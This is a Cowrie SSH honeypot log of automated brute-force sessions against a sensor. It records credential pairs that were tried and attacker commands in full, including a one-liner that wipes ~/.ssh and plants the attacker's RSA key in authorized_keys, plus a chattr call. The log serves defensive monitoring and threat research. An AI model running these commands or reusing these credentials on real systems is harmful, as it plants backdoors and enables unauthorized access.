{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:03:51.672632Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:03:51.856365Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:51.857270Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.session.connect","src_ip":"27.254.235.13","src_port":44584,"dst_ip":"1.2.3.4","dst_port":22,"session":"07eb79121199","protocol":"ssh","message":"New connection: 27.254.235.13:44584 (1.2.3.4:22) [session: 07eb79121199]","sensor":"my-vps","timestamp":"2025-08-26T10:03:52.035968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:03:52.037098Z","src_ip":"27.254.235.13","session":"07eb79121199"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:03:52.218165Z","src_ip":"27.254.235.13","session":"07eb79121199"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:03:52.980091Z","src_ip":"27.254.235.13","session":"07eb79121199"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:54.163071Z","src_ip":"27.254.235.13","session":"07eb79121199"}
{"eventid":"cowrie.session.connect","src_ip":"27.254.235.13","src_port":45150,"dst_ip":"1.2.3.4","dst_port":22,"session":"3811575ecc30","protocol":"ssh","message":"New connection: 27.254.235.13:45150 (1.2.3.4:22) [session: 3811575ecc30]","sensor":"my-vps","timestamp":"2025-08-26T10:03:54.342950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:03:54.343644Z","src_ip":"27.254.235.13","session":"3811575ecc30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:03:54.524594Z","src_ip":"27.254.235.13","session":"3811575ecc30"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:03:55.289090Z","src_ip":"27.254.235.13","session":"3811575ecc30"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:55.471479Z","src_ip":"27.254.235.13","session":"edded74585c9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:03:55.472591Z","src_ip":"27.254.235.13","session":"3811575ecc30"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:04:18.299259Z","src_ip":"212.227.125.160","session":"6d49891b705e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39456,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfd0adc7edb6","protocol":"ssh","message":"New connection: 196.251.86.249:39456 (1.2.3.4:22) [session: dfd0adc7edb6]","sensor":"my-vps","timestamp":"2025-08-26T10:04:34.567321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:04:35.102053Z","src_ip":"196.251.86.249","session":"dfd0adc7edb6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:04:35.103046Z","src_ip":"196.251.86.249","session":"dfd0adc7edb6"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"p@ssw0rd","message":"login attempt [postgres/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T10:04:36.830172Z","src_ip":"196.251.86.249","session":"dfd0adc7edb6"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:04:38.207391Z","src_ip":"196.251.86.249","session":"dfd0adc7edb6"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.117.148","src_port":55338,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d8fbdb7fc7c","protocol":"ssh","message":"New connection: 101.36.117.148:55338 (1.2.3.4:22) [session: 5d8fbdb7fc7c]","sensor":"my-vps","timestamp":"2025-08-26T10:04:52.285665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:04:52.286433Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:04:52.538936Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.login.success","username":"root","password":"Centos@2025","message":"login attempt [root/Centos@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:04:53.591482Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:04:54.164575Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:04:54.165491Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:04:54.166759Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:04:54.420541Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:04:54.951270Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:04:54.952154Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:04:55.207080Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:04:55.208198Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.117.148","src_port":55354,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb3ba44e4b47","protocol":"ssh","message":"New connection: 101.36.117.148:55354 (1.2.3.4:22) [session: fb3ba44e4b47]","sensor":"my-vps","timestamp":"2025-08-26T10:04:55.459637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:04:55.460681Z","src_ip":"101.36.117.148","session":"fb3ba44e4b47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:04:55.713237Z","src_ip":"101.36.117.148","session":"fb3ba44e4b47"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:04:56.765797Z","src_ip":"101.36.117.148","session":"fb3ba44e4b47"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:04:58.020725Z","src_ip":"101.36.117.148","session":"fb3ba44e4b47"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.117.148","src_port":36790,"dst_ip":"1.2.3.4","dst_port":22,"session":"43ced3787237","protocol":"ssh","message":"New connection: 101.36.117.148:36790 (1.2.3.4:22) [session: 43ced3787237]","sensor":"my-vps","timestamp":"2025-08-26T10:04:58.272302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:04:58.273047Z","src_ip":"101.36.117.148","session":"43ced3787237"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:04:58.525743Z","src_ip":"101.36.117.148","session":"43ced3787237"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:04:59.575174Z","src_ip":"101.36.117.148","session":"43ced3787237"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:04:59.828781Z","src_ip":"101.36.117.148","session":"5d8fbdb7fc7c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:04:59.829723Z","src_ip":"101.36.117.148","session":"43ced3787237"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39316,"dst_ip":"1.2.3.4","dst_port":22,"session":"23afe8d01743","protocol":"ssh","message":"New connection: 196.251.86.249:39316 (1.2.3.4:22) [session: 23afe8d01743]","sensor":"my-vps","timestamp":"2025-08-26T10:05:37.781225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:05:38.168593Z","src_ip":"196.251.86.249","session":"23afe8d01743"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:05:38.169292Z","src_ip":"196.251.86.249","session":"23afe8d01743"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T10:05:40.487610Z","src_ip":"196.251.86.249","session":"23afe8d01743"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:05:42.026825Z","src_ip":"196.251.86.249","session":"23afe8d01743"}
{"eventid":"cowrie.session.connect","src_ip":"177.229.197.38","src_port":47352,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b2db2754fc2","protocol":"ssh","message":"New connection: 177.229.197.38:47352 (1.2.3.4:22) [session: 4b2db2754fc2]","sensor":"my-vps","timestamp":"2025-08-26T10:06:01.179440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:06:01.180431Z","src_ip":"177.229.197.38","session":"4b2db2754fc2"}
